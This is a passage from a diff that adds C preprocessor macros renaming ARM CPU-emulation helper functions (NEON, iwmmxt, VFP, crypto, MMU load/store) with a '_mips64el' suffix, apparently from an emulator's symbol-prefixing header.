helper_be_ldul_mmu_mips64el +#define helper_be_lduw_mmu helper_be_lduw_mmu_mips64el +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mips64el +#define helper_be_stl_mmu helper_be_stl_mmu_mips64el +#define helper_be_stq_mmu helper_be_stq_mmu_mips64el +#define helper_be_stw_mmu helper_be_stw_mmu_mips64el +#define helper_clear_pstate_ss helper_clear_pstate_ss_mips64el +#define helper_clz_arm helper_clz_arm_mips64el +#define helper_cpsr_read helper_cpsr_read_mips64el 
+#define helper_cpsr_write helper_cpsr_write_mips64el +#define helper_crc32_arm helper_crc32_arm_mips64el +#define helper_crc32c helper_crc32c_mips64el +#define helper_crypto_aese helper_crypto_aese_mips64el +#define helper_crypto_aesmc helper_crypto_aesmc_mips64el +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mips64el +#define helper_crypto_sha1h helper_crypto_sha1h_mips64el +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mips64el +#define helper_crypto_sha256h helper_crypto_sha256h_mips64el +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mips64el +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mips64el +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mips64el +#define helper_dc_zva helper_dc_zva_mips64el +#define helper_double_saturate helper_double_saturate_mips64el +#define helper_exception_internal helper_exception_internal_mips64el +#define helper_exception_return helper_exception_return_mips64el +#define helper_exception_with_syndrome helper_exception_with_syndrome_mips64el +#define helper_get_cp_reg helper_get_cp_reg_mips64el +#define helper_get_cp_reg64 helper_get_cp_reg64_mips64el +#define helper_get_r13_banked helper_get_r13_banked_mips64el +#define helper_get_user_reg helper_get_user_reg_mips64el +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mips64el +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mips64el +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mips64el +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mips64el +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mips64el +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mips64el +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mips64el +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mips64el +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mips64el +#define helper_iwmmxt_addub helper_iwmmxt_addub_mips64el +#define helper_iwmmxt_addul helper_iwmmxt_addul_mips64el +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mips64el +#define helper_iwmmxt_align 
helper_iwmmxt_align_mips64el +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mips64el +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mips64el +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mips64el +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mips64el +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mips64el +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mips64el +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mips64el +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mips64el +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mips64el +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mips64el +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mips64el +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mips64el +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mips64el +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mips64el +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mips64el +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mips64el +#define helper_iwmmxt_insr helper_iwmmxt_insr_mips64el +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mips64el +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mips64el +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mips64el +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mips64el +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mips64el +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mips64el +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mips64el +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mips64el +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mips64el +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mips64el +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mips64el +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mips64el +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mips64el +#define helper_iwmmxt_minub helper_iwmmxt_minub_mips64el +#define helper_iwmmxt_minul helper_iwmmxt_minul_mips64el +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mips64el +#define 
helper_iwmmxt_msbb helper_iwmmxt_msbb_mips64el +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mips64el +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mips64el +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mips64el +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mips64el +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mips64el +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mips64el +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mips64el +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mips64el +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mips64el +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mips64el +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mips64el +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mips64el +#define helper_iwmmxt_packul helper_iwmmxt_packul_mips64el +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mips64el +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_mips64el +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mips64el +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mips64el +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_mips64el +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mips64el +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mips64el +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mips64el +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mips64el +#define helper_iwmmxt_slll helper_iwmmxt_slll_mips64el +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mips64el +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mips64el +#define helper_iwmmxt_sral helper_iwmmxt_sral_mips64el +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mips64el +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mips64el +#define helper_iwmmxt_srll helper_iwmmxt_srll_mips64el +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mips64el +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mips64el +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mips64el +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mips64el +#define 
helper_iwmmxt_subnw helper_iwmmxt_subnw_mips64el +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mips64el +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mips64el +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_mips64el +#define helper_iwmmxt_subub helper_iwmmxt_subub_mips64el +#define helper_iwmmxt_subul helper_iwmmxt_subul_mips64el +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mips64el +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mips64el +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mips64el +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mips64el +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mips64el +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mips64el +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mips64el +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mips64el +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mips64el +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mips64el +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mips64el +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mips64el +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_mips64el +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mips64el +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mips64el +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mips64el +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mips64el +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mips64el +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mips64el +#define helper_ldb_cmmu helper_ldb_cmmu_mips64el +#define helper_ldb_mmu helper_ldb_mmu_mips64el +#define helper_ldl_cmmu helper_ldl_cmmu_mips64el +#define helper_ldl_mmu helper_ldl_mmu_mips64el +#define helper_ldq_cmmu helper_ldq_cmmu_mips64el +#define helper_ldq_mmu helper_ldq_mmu_mips64el +#define helper_ldw_cmmu helper_ldw_cmmu_mips64el +#define helper_ldw_mmu helper_ldw_mmu_mips64el +#define helper_le_ldl_cmmu 
helper_le_ldl_cmmu_mips64el +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mips64el +#define helper_le_ldq_mmu helper_le_ldq_mmu_mips64el +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64el +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64el +#define helper_le_ldul_mmu helper_le_ldul_mmu_mips64el +#define helper_le_lduw_mmu helper_le_lduw_mmu_mips64el +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mips64el +#define helper_le_stl_mmu helper_le_stl_mmu_mips64el +#define helper_le_stq_mmu helper_le_stq_mmu_mips64el +#define helper_le_stw_mmu helper_le_stw_mmu_mips64el +#define helper_msr_i_pstate helper_msr_i_pstate_mips64el +#define helper_neon_abd_f32 helper_neon_abd_f32_mips64el +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mips64el +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mips64el +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mips64el +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mips64el +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mips64el +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mips64el +#define helper_neon_abd_s16 helper_neon_abd_s16_mips64el +#define helper_neon_abd_s32 helper_neon_abd_s32_mips64el +#define helper_neon_abd_s8 helper_neon_abd_s8_mips64el +#define helper_neon_abd_u16 helper_neon_abd_u16_mips64el +#define helper_neon_abd_u32 helper_neon_abd_u32_mips64el +#define helper_neon_abd_u8 helper_neon_abd_u8_mips64el +#define helper_neon_abs_s16 helper_neon_abs_s16_mips64el +#define helper_neon_abs_s8 helper_neon_abs_s8_mips64el +#define helper_neon_acge_f32 helper_neon_acge_f32_mips64el +#define helper_neon_acge_f64 helper_neon_acge_f64_mips64el +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mips64el +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mips64el +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mips64el +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mips64el +#define helper_neon_addl_u16 helper_neon_addl_u16_mips64el +#define helper_neon_addl_u32 
helper_neon_addl_u32_mips64el +#define helper_neon_add_u16 helper_neon_add_u16_mips64el +#define helper_neon_add_u8 helper_neon_add_u8_mips64el +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mips64el +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mips64el +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mips64el +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mips64el +#define helper_neon_cge_f32 helper_neon_cge_f32_mips64el +#define helper_neon_cge_s16 helper_neon_cge_s16_mips64el +#define helper_neon_cge_s32 helper_neon_cge_s32_mips64el +#define helper_neon_cge_s8 helper_neon_cge_s8_mips64el +#define helper_neon_cge_u16 helper_neon_cge_u16_mips64el +#define helper_neon_cge_u32 helper_neon_cge_u32_mips64el +#define helper_neon_cge_u8 helper_neon_cge_u8_mips64el +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mips64el +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mips64el +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mips64el +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mips64el +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mips64el +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mips64el +#define helper_neon_cgt_u8 helper_neon_cgt_u8_mips64el +#define helper_neon_cls_s16 helper_neon_cls_s16_mips64el +#define helper_neon_cls_s32 helper_neon_cls_s32_mips64el +#define helper_neon_cls_s8 helper_neon_cls_s8_mips64el +#define helper_neon_clz_u16 helper_neon_clz_u16_mips64el +#define helper_neon_clz_u8 helper_neon_clz_u8_mips64el +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mips64el +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mips64el +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mips64el +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mips64el +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mips64el +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mips64el +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mips64el +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mips64el +#define helper_neon_hadd_u8 
helper_neon_hadd_u8_mips64el +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mips64el +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mips64el +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mips64el +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mips64el +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mips64el +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mips64el +#define helper_neon_max_s16 helper_neon_max_s16_mips64el +#define helper_neon_max_s32 helper_neon_max_s32_mips64el +#define helper_neon_max_s8 helper_neon_max_s8_mips64el +#define helper_neon_max_u16 helper_neon_max_u16_mips64el +#define helper_neon_max_u32 helper_neon_max_u32_mips64el +#define helper_neon_max_u8 helper_neon_max_u8_mips64el +#define helper_neon_min_s16 helper_neon_min_s16_mips64el +#define helper_neon_min_s32 helper_neon_min_s32_mips64el +#define helper_neon_min_s8 helper_neon_min_s8_mips64el +#define helper_neon_min_u16 helper_neon_min_u16_mips64el +#define helper_neon_min_u32 helper_neon_min_u32_mips64el +#define helper_neon_min_u8 helper_neon_min_u8_mips64el +#define helper_neon_mull_p8 helper_neon_mull_p8_mips64el +#define helper_neon_mull_s16 helper_neon_mull_s16_mips64el +#define helper_neon_mull_s8 helper_neon_mull_s8_mips64el +#define helper_neon_mull_u16 helper_neon_mull_u16_mips64el +#define helper_neon_mull_u8 helper_neon_mull_u8_mips64el +#define helper_neon_mul_p8 helper_neon_mul_p8_mips64el +#define helper_neon_mul_u16 helper_neon_mul_u16_mips64el +#define helper_neon_mul_u8 helper_neon_mul_u8_mips64el +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mips64el +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mips64el +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mips64el +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mips64el +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mips64el +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mips64el 
+#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mips64el +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mips64el +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mips64el +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mips64el +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mips64el +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mips64el +#define helper_neon_negl_u16 helper_neon_negl_u16_mips64el +#define helper_neon_negl_u32 helper_neon_negl_u32_mips64el +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mips64el +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mips64el +#define helper_neon_padd_u16 helper_neon_padd_u16_mips64el +#define helper_neon_padd_u8 helper_neon_padd_u8_mips64el +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mips64el +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mips64el +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mips64el +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mips64el +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mips64el +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mips64el +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mips64el +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mips64el +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mips64el +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mips64el +#define helper_neon_qabs_s16 helper_neon_qabs_s16_mips64el +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mips64el +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mips64el +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mips64el +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mips64el +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mips64el +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mips64el +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mips64el +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mips64el +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mips64el +#define 
helper_neon_qadd_u64 helper_neon_qadd_u64_mips64el +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mips64el +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mips64el +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mips64el +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mips64el +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mips64el +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mips64el +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mips64el +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mips64el +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mips64el +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mips64el +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mips64el +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mips64el +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mips64el +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_mips64el +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mips64el +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mips64el +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mips64el +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mips64el +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mips64el +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mips64el +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mips64el +#define helper_neon_qshl_u16 helper_neon_qshl_u16_mips64el +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mips64el +#define helper_neon_qshl_u64 helper_neon_qshl_u64_mips64el +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mips64el +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mips64el +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mips64el +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mips64el +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mips64el +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mips64el +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mips64el +#define helper_neon_qsub_s64 
helper_neon_qsub_s64_mips64el +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mips64el +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mips64el +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mips64el +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mips64el +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mips64el +#define helper_neon_qunzip16 helper_neon_qunzip16_mips64el +#define helper_neon_qunzip32 helper_neon_qunzip32_mips64el +#define helper_neon_qunzip8 helper_neon_qunzip8_mips64el +#define helper_neon_qzip16 helper_neon_qzip16_mips64el +#define helper_neon_qzip32 helper_neon_qzip32_mips64el +#define helper_neon_qzip8 helper_neon_qzip8_mips64el +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mips64el +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mips64el +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mips64el +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mips64el +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mips64el +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_mips64el +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mips64el +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mips64el +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mips64el +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mips64el +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mips64el +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mips64el +#define helper_neon_rshl_u32 helper_neon_rshl_u32_mips64el +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mips64el +#define helper_neon_rshl_u8 helper_neon_rshl_u8_mips64el +#define helper_neon_shl_s16 helper_neon_shl_s16_mips64el +#define helper_neon_shl_s32 helper_neon_shl_s32_mips64el +#define helper_neon_shl_s64 helper_neon_shl_s64_mips64el +#define helper_neon_shl_s8 helper_neon_shl_s8_mips64el +#define helper_neon_shl_u16 helper_neon_shl_u16_mips64el +#define helper_neon_shl_u32 helper_neon_shl_u32_mips64el +#define helper_neon_shl_u64 helper_neon_shl_u64_mips64el +#define 
helper_neon_shl_u8 helper_neon_shl_u8_mips64el +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mips64el +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mips64el +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mips64el +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mips64el +#define helper_neon_subl_u16 helper_neon_subl_u16_mips64el +#define helper_neon_subl_u32 helper_neon_subl_u32_mips64el +#define helper_neon_sub_u16 helper_neon_sub_u16_mips64el +#define helper_neon_sub_u8 helper_neon_sub_u8_mips64el +#define helper_neon_tbl helper_neon_tbl_mips64el +#define helper_neon_tst_u16 helper_neon_tst_u16_mips64el +#define helper_neon_tst_u32 helper_neon_tst_u32_mips64el +#define helper_neon_tst_u8 helper_neon_tst_u8_mips64el +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mips64el +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mips64el +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mips64el +#define helper_neon_unzip16 helper_neon_unzip16_mips64el +#define helper_neon_unzip8 helper_neon_unzip8_mips64el +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mips64el +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_mips64el +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mips64el +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mips64el +#define helper_neon_widen_s16 helper_neon_widen_s16_mips64el +#define helper_neon_widen_s8 helper_neon_widen_s8_mips64el +#define helper_neon_widen_u16 helper_neon_widen_u16_mips64el +#define helper_neon_widen_u8 helper_neon_widen_u8_mips64el +#define helper_neon_zip16 helper_neon_zip16_mips64el +#define helper_neon_zip8 helper_neon_zip8_mips64el +#define helper_pre_hvc helper_pre_hvc_mips64el +#define helper_pre_smc helper_pre_smc_mips64el +#define helper_qadd16 helper_qadd16_mips64el +#define helper_qadd8 helper_qadd8_mips64el +#define helper_qaddsubx helper_qaddsubx_mips64el +#define helper_qsub16 helper_qsub16_mips64el +#define helper_qsub8 helper_qsub8_mips64el 
+#define helper_qsubaddx helper_qsubaddx_mips64el +#define helper_rbit helper_rbit_mips64el +#define helper_recpe_f32 helper_recpe_f32_mips64el +#define helper_recpe_f64 helper_recpe_f64_mips64el +#define helper_recpe_u32 helper_recpe_u32_mips64el +#define helper_recps_f32 helper_recps_f32_mips64el +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mips64el +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64el +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64el +#define helper_ret_stb_mmu helper_ret_stb_mmu_mips64el +#define helper_rintd helper_rintd_mips64el +#define helper_rintd_exact helper_rintd_exact_mips64el +#define helper_rints helper_rints_mips64el +#define helper_rints_exact helper_rints_exact_mips64el +#define helper_ror_cc helper_ror_cc_mips64el +#define helper_rsqrte_f32 helper_rsqrte_f32_mips64el +#define helper_rsqrte_f64 helper_rsqrte_f64_mips64el +#define helper_rsqrte_u32 helper_rsqrte_u32_mips64el +#define helper_rsqrts_f32 helper_rsqrts_f32_mips64el +#define helper_sadd16 helper_sadd16_mips64el +#define helper_sadd8 helper_sadd8_mips64el +#define helper_saddsubx helper_saddsubx_mips64el +#define helper_sar_cc helper_sar_cc_mips64el +#define helper_sdiv helper_sdiv_mips64el +#define helper_sel_flags helper_sel_flags_mips64el +#define helper_set_cp_reg helper_set_cp_reg_mips64el +#define helper_set_cp_reg64 helper_set_cp_reg64_mips64el +#define helper_set_neon_rmode helper_set_neon_rmode_mips64el +#define helper_set_r13_banked helper_set_r13_banked_mips64el +#define helper_set_rmode helper_set_rmode_mips64el +#define helper_set_user_reg helper_set_user_reg_mips64el +#define helper_shadd16 helper_shadd16_mips64el +#define helper_shadd8 helper_shadd8_mips64el +#define helper_shaddsubx helper_shaddsubx_mips64el +#define helper_shl_cc helper_shl_cc_mips64el +#define helper_shr_cc helper_shr_cc_mips64el +#define helper_shsub16 helper_shsub16_mips64el +#define helper_shsub8 helper_shsub8_mips64el +#define helper_shsubaddx 
helper_shsubaddx_mips64el +#define helper_ssat helper_ssat_mips64el +#define helper_ssat16 helper_ssat16_mips64el +#define helper_ssub16 helper_ssub16_mips64el +#define helper_ssub8 helper_ssub8_mips64el +#define helper_ssubaddx helper_ssubaddx_mips64el +#define helper_stb_mmu helper_stb_mmu_mips64el +#define helper_stl_mmu helper_stl_mmu_mips64el +#define helper_stq_mmu helper_stq_mmu_mips64el +#define helper_stw_mmu helper_stw_mmu_mips64el +#define helper_sub_saturate helper_sub_saturate_mips64el +#define helper_sub_usaturate helper_sub_usaturate_mips64el +#define helper_sxtb16 helper_sxtb16_mips64el +#define helper_uadd16 helper_uadd16_mips64el +#define helper_uadd8 helper_uadd8_mips64el +#define helper_uaddsubx helper_uaddsubx_mips64el +#define helper_udiv helper_udiv_mips64el +#define helper_uhadd16 helper_uhadd16_mips64el +#define helper_uhadd8 helper_uhadd8_mips64el +#define helper_uhaddsubx helper_uhaddsubx_mips64el +#define helper_uhsub16 helper_uhsub16_mips64el +#define helper_uhsub8 helper_uhsub8_mips64el +#define helper_uhsubaddx helper_uhsubaddx_mips64el +#define helper_uqadd16 helper_uqadd16_mips64el +#define helper_uqadd8 helper_uqadd8_mips64el +#define helper_uqaddsubx helper_uqaddsubx_mips64el +#define helper_uqsub16 helper_uqsub16_mips64el +#define helper_uqsub8 helper_uqsub8_mips64el +#define helper_uqsubaddx helper_uqsubaddx_mips64el +#define helper_usad8 helper_usad8_mips64el +#define helper_usat helper_usat_mips64el +#define helper_usat16 helper_usat16_mips64el +#define helper_usub16 helper_usub16_mips64el +#define helper_usub8 helper_usub8_mips64el +#define helper_usubaddx helper_usubaddx_mips64el +#define helper_uxtb16 helper_uxtb16_mips64el +#define helper_v7m_mrs helper_v7m_mrs_mips64el +#define helper_v7m_msr helper_v7m_msr_mips64el +#define helper_vfp_absd helper_vfp_absd_mips64el +#define helper_vfp_abss helper_vfp_abss_mips64el +#define helper_vfp_addd helper_vfp_addd_mips64el +#define helper_vfp_adds helper_vfp_adds_mips64el +#define 
